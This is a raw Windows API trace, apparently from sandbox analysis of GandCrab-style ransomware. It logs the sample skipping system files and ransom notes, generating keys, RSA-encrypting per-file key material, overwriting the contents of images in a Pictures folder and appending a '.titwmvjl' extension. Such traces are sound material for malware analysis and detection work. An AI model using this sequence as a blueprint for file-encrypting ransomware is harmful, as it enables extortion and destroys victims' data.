[0093.847] lstrcmpW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="..") returned 1 [0093.848] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\", lpString2="emJ3ZNvJOxwkrKOed0kc.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp" [0093.848] lstrlenW (lpString=".titwmvjl") returned 9 [0093.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp") returned 75 [0093.848] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.848] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp.titwmvjl") returned 84 [0093.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp") returned 75 [0093.848] lstrlenW (lpString=".bmp") returned 4 [0093.848] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.848] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0093.848] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0093.848] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp") returned 75 [0093.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp") returned 75 [0093.848] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="desktop.ini") returned 1 [0093.848] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="autorun.inf") returned 1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="ntuser.dat") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="iconcache.db") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="bootsect.bak") returned 1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="boot.ini") returned 1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="ntuser.dat.log") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="thumbs.db") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="KRAB-DECRYPT.html") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="ntldr") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="NTDETECT.COM") returned -1 [0093.849] lstrcmpiW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2="Bootfont.bin") returned 1 [0093.849] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp") returned 75 [0093.849] lstrlenW (lpString=".bmp") returned 4 [0093.849] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.849] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0093.849] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.849] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.849] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\emj3znvjoxwkrkoed0kc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.850] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.850] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.851] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.851] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.851] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.851] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.851] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.852] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.852] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.852] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.852] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.852] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.852] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.853] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.853] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.853] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.853] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.853] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.853] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.854] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503578) returned 1 [0093.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.854] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.854] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.854] GetLastError () returned 0x0 [0093.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.854] CryptDestroyKey (hKey=0x503578) returned 1 [0093.855] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.855] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.855] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.855] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.855] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.855] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0093.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.856] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.856] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.856] GetLastError () returned 0x0 [0093.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.856] CryptDestroyKey (hKey=0x5038f8) returned 1 [0093.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.857] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.857] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.857] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.857] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x130f3, lpOverlapped=0x0) returned 1 [0093.874] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffecf0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.874] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x130f3, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x130f3, lpOverlapped=0x0) returned 1 [0093.875] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.876] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.877] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.881] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.881] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.882] CloseHandle (hObject=0x2b4) returned 1 [0093.882] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\emj3znvjoxwkrkoed0kc.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\emJ3ZNvJOxwkrKOed0kc.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\emj3znvjoxwkrkoed0kc.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0093.883] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.883] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.883] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0093.883] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0093.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\TITWMVJL-DECRYPT.txt" [0093.883] lstrlenW (lpString=".titwmvjl") returned 9 [0093.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\TITWMVJL-DECRYPT.txt") returned 71 [0093.883] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.883] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 80 [0093.884] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\TITWMVJL-DECRYPT.txt") returned 71 [0093.884] lstrlenW (lpString=".txt") returned 4 [0093.884] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.884] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0093.884] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0093.884] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.884] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\TITWMVJL-DECRYPT.txt") returned 71 [0093.884] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\TITWMVJL-DECRYPT.txt") returned 71 [0093.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0093.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0093.884] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0093.884] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.884] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.884] lstrcmpW (lpString1="v2h uSr5.bmp", lpString2=".") returned 1 [0093.884] lstrcmpW (lpString1="v2h uSr5.bmp", lpString2="..") returned 1 [0093.884] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\", lpString2="v2h uSr5.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp" [0093.884] lstrlenW (lpString=".titwmvjl") returned 9 [0093.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp") returned 63 [0093.885] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.885] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp.titwmvjl") returned 72 [0093.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp") returned 63 [0093.885] lstrlenW (lpString=".bmp") returned 4 [0093.885] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.885] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0093.885] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0093.885] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp") returned 63 [0093.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp") returned 63 [0093.885] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="desktop.ini") returned 1 [0093.885] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="autorun.inf") returned 1 [0093.885] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="ntuser.dat") returned 1 [0093.885] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="iconcache.db") returned 1 [0093.885] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="bootsect.bak") returned 1 [0093.885] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="boot.ini") returned 1 [0093.885] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="ntuser.dat.log") returned 1 [0093.885] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="thumbs.db") returned 1 [0093.886] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0093.886] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0093.886] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0093.886] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0093.886] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.886] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.886] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="ntldr") returned 1 [0093.886] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="NTDETECT.COM") returned 1 [0093.886] lstrcmpiW (lpString1="v2h uSr5.bmp", lpString2="Bootfont.bin") returned 1 [0093.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp") returned 63 [0093.886] lstrlenW (lpString=".bmp") returned 4 [0093.886] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.886] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0093.886] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.886] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.886] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\v2h usr5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.887] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.887] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.888] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.888] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.888] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.888] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.888] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.889] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.889] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.889] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.889] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.889] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.889] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.890] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.890] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.890] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.890] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.890] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.890] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.890] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.891] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0093.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.891] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.891] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.891] GetLastError () returned 0x0 [0093.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.891] CryptDestroyKey (hKey=0x5038f8) returned 1 [0093.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.892] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.892] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.892] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503978) returned 1 [0093.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.893] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.893] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.893] GetLastError () returned 0x0 [0093.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.893] CryptDestroyKey (hKey=0x503978) returned 1 [0093.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.893] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.893] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.894] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.894] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xc38e, lpOverlapped=0x0) returned 1 [0093.906] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff3c72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.906] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc38e, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xc38e, lpOverlapped=0x0) returned 1 [0093.907] 